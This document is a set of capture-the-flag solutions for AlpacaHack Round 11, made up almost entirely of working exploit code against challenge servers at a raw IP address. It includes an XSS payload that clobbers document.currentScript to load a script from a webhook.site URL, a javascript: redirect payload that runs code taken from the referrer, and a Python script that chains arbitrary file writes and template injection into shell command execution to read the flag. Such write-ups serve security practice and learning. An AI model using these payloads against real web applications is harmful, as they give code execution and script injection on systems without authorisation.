AlpacaHack Round 11 solutions

alpaca-mark.md

Clobbering document.currentScript.

if (!e && t && (t.currentScript && "SCRIPT" === t.currentScript.tagName.toUpperCase() && (e = t.currentScript.src),

http://34.170.146.252:25903/?markdown=%3C/textarea%3E%3C/form%3E%3Cscript%20src=%22https://webhook.site/ec8dae46-b8ee-44a7-a4a8-d065f047ed60/%22%3E%3C/script%3E%3Cform%20name=%22currentScript%22%3E%3C/form%3E

jackpot.py

import urllib.parse
import re
a = ''
q = ''
for i in range(0xfffff):
	try:
		if(int(chr(i)) == 7 and re.fullmatch(r'\d+',chr(i)+chr(i))):
			q += chr(i)
	except:
		pass
print(urllib.parse.quote_plus(q[:10]))
# http://34.170.146.252:33352/slot?candidates=7%D9%A7%DB%B7%DF%87%E0%A5%AD%E0%A7%AD%E0%A9%AD%E0%AB%AD%E0%AD%AD%E0%AF%AD

redirector.html

<meta name="referrer" content="unsafe-url" />
<script>
 // current src: ?%0aalert()
location="http://34.170.146.252:48709/?next=javascript:with(document)setTimeout(decodeURIComponent(referrer))"
</script>

tiny-note.py

import requests

t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'from_pyfile',
	'title':'z'
},allow_redirects=False)
uid = t.headers['Location'].split('/')[1]

t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'{{config[content]("l")}}',
	'title':'/app/templates/note.html'
},allow_redirects=False)

t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'import os;a=os.system',
	'title':'/app/q.py'
},allow_redirects=False)

t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'cat /fl*>templates/q',
	'title':'/ee'
},allow_redirects=False)

t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'import q;q.a("sh /ee")',
	'title':'/app/l'
},allow_redirects=False)


t = requests.post('http://34.170.146.252:42048/new',data={
	'content':'{%include "q"%}',
	'title':'/app/templates/index.html'
},allow_redirects=False)

print(requests.get(f'http://34.170.146.252:42048/{uid}/z').text)